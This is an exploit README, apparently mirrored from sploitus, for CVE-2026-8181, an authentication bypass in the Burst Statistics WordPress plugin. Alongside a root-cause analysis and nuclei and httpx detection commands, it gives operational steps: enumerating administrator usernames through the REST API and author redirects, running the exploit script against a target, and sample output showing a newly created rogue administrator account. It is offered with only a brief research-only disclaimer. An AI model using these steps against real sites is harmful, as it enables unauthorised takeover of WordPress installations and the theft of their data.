## https://sploitus.com/exploit?id=63C1AEEC-D5CC-5F18-BFC5-26EBEA776153
# CVE-2026-8181 exploit
### Burst Statistics WordPress Plugin โ Authentication Bypass to Administrator Privilege Escalation
Exploit for the CVE-2026-8181 discovered by [Chloe Chamberland](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland) and [PRISM](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism).
### โ ๏ธ Disclaimer
This repository is provided for **research and defensive security purposes only**.
The author assumes no responsibility for misuse of this information.
---
## ๐ Overview
The **Burst Statistics โ Privacy-Friendly WordPress Analytics** plugin for WordPress is vulnerable to an **Authentication Bypass leading to Administrator Privilege Escalation** in versions **3.4.0 through 3.4.1.1**.
The vulnerability exists in the `is_mainwp_authenticated()` method of the plugin's MainWP proxy, which incorrectly treats any non-`WP_Error` return value from `wp_authenticate_application_password()` as a successful authentication.
This allows **unauthenticated attackers** that know a valid administrator username to **impersonate that administrator for the duration of any REST API request**, including WordPress core endpoints such as `POST /wp-json/wp/v2/users`. The existing administrator's credentials are never compromised, but the attacker gains its privileges long enough to create a brand new administrator account.
---
## ๐ฌ Root Cause Analysis
The vulnerability chain is as follows:
1. **`includes/class-burst.php:41`** -> The plugin registers `init()` on `plugins_loaded` priority `9`, which runs `bootstrap()` and calls `has_admin_access()` for every request (REST included).
2. **`includes/Traits/trait-admin-helper.php:202`** -> When the request carries the header `X-BurstMainWP: 1`, `has_admin_access()` instantiates `MainWP_Proxy` and delegates authentication to `is_mainwp_authenticated()`.
3. **`includes/Frontend/class-mainwp-proxy.php:314`** -> The method reads the `Authorization` header, decodes the Basic credentials and forwards the attacker-supplied `username` / `password` to WordPress core's `wp_authenticate_application_password()`.
4. **`includes/Frontend/class-mainwp-proxy.php:328-329`** -> The return value is only checked with `is_wp_error()`. WordPress core returns the unmodified `$input_user` (here `null`) when Application Passwords are not in use **or** when the request is not flagged as an API request. At `plugins_loaded` priority `9` the REST API has not yet set the `application_password_is_api_request` filter to `true`, so the second condition is always met when the vulnerable code runs โ and `null` is not a `WP_Error`, so the guard passes.
5. **`includes/Frontend/class-mainwp-proxy.php:336`** -> `wp_set_current_user( $user->ID )` is called with the user looked up purely from the attacker-supplied username, setting the globally authenticated user for the entire request.
A single HTTP request with a fake password is therefore sufficient to impersonate any administrator at the WordPress core REST API level.
---
## ๐ Plugin installation detection
1. **Active plugin** โ homepage HTML references its assets only when the plugin is enqueued:
```bash
echo http://127.0.0.1:8000 | httpx -silent -mr '/wp-content/plugins/burst-statistics/'
```
2. **Version** โ `readme.txt` is served statically and exposes the installed version (vulnerable: `3.4.0`โ`3.4.1.1`, patched: `3.4.2+`):
```bash
echo http://127.0.0.1:8000 | httpx -silent -path /wp-content/plugins/burst-statistics/readme.txt -er 'Stable tag:\s*[0-9][0-9a-zA-Z.\-]*'
```
The bundled [`CVE-2026-8181.yaml`](CVE-2026-8181.yaml) [nuclei](https://github.com/projectdiscovery/nuclei) template automates both checks and version comparison:
```bash
nuclei -t CVE-2026-8181.yaml -u http://127.0.0.1:8000
```
---
## ๐ฏ Exploitation
Once a vulnerable version of the plugin has been detected, exploitation requires knowing a valid administrator username. WordPress's REST API leaks them on most installs through the public users endpoint:
```bash
echo http://127.0.0.1:8000 | httpx -silent -path '/wp-json/wp/v2/users' -er '"slug":"[^"]+"'
```
When that endpoint is locked down (e.g. by *Disable REST API* or *Stop User Enumeration*), the author archive trick (`/?author=N`) usually still leaks the username via the redirect to `/author//`.
With a valid username in hand the exploit creates a new administrator account in a single request:
0. Install python dependencies:
```bash
python3 -m venv venv
venv/bin/pip install -r requirements.txt
```
1. Run the exploit against the target, supplying a known administrator username with `-u`:
```bash
venv/bin/python3 CVE-2026-8181.py -t http://127.0.0.1:8000 -u admin
```
Output example:
```
[2026-05-16] [12:20:20] [info] [config] Impersonating admin='admin', will create new admin 'pwn_322a4903' / 'kS8D^2A^P^%UtWyuUS3p8%64' (pwn_322a4903@example.test).
[2026-05-16] [12:20:21] [success] [http://127.0.0.1:8000] Authentication bypass successful โ new administrator created: username='pwn_322a4903' password='kS8D^2A^P^%UtWyuUS3p8%64'
```
2. Log into `/wp-admin/` with the newly created administrator account.
---
## โ ๏ธ Limitations
The bypass only fires if the `Authorization` header reaches PHP via `$_SERVER['HTTP_AUTHORIZATION']`. On **Apache + mod_php with plain permalinks** (WordPress's out-of-the-box default), no `.htaccess` is generated and the header is silently stripped โ the exploit cannot succeed.
Switching to any non-plain permalink in `Settings โ Permalinks` makes WordPress 5.6+ write the `RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]` directive into `.htaccess`, restoring forwarding. **Nginx + PHP-FPM** and **LiteSpeed** forward `Authorization` by default regardless of permalinks. Pretty permalinks being the SEO norm in production is why this vulnerability is rated **CVSS 9.8 unauthenticated**.
The exploit tries `/wp-json/wp/v2/users` first then falls back to `/index.php?rest_route=/wp/v2/users` so endpoint routing is never the blocker โ only header forwarding is.
---
## ๐ References
* https://www.wordfence.com/blog/2026/05/200000-wordpress-sites-at-risk-from-critical-authentication-bypass-vulnerability-in-burst-statistics-plugin/
* https://www.wordfence.com/threat-intel/vulnerabilities/id/8ca830d6-3d3c-4026-85cd-8447b8a568d3
* https://vulners.com/cve/CVE-2026-8181